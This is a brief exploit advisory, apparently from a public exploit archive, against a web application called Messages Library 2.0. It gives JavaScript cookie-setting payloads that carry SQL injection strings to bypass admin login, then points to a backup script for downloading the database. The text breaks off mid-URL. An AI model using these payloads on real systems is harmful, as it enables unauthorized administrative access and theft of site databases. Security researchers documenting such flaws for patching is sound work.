Messages Library 2.0 - Insecure Cookie Handling

Messages Library 2.0 = Arbitrary Database Download Vulnerability Founded & Exploited by : Stack Bypass with javascript:document.cookie = "SaphpLessonName=admin' or 1=1--; path=/"; javascript:document.cookie = "SaphpLessonPassword=' or 1=1--; path=/"; After Exec http://localhost/sms/admin/backup.p...